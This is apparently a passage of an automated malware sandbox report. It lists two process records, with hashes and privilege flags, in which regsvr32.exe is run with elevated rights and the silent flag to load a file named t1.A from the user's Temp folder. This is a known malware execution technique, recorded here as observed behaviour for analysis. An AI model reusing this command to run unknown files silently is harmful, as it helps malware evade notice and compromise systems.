                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:19:52:07
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                      Imagebase:0x7ff6a0db0000
                                                                                                                                                                      File size:24064 bytes
                                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:19:52:10
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline: -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                      Imagebase:0x9d0000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                                                      Disassembly

                                                                                                                                                                      No disassembly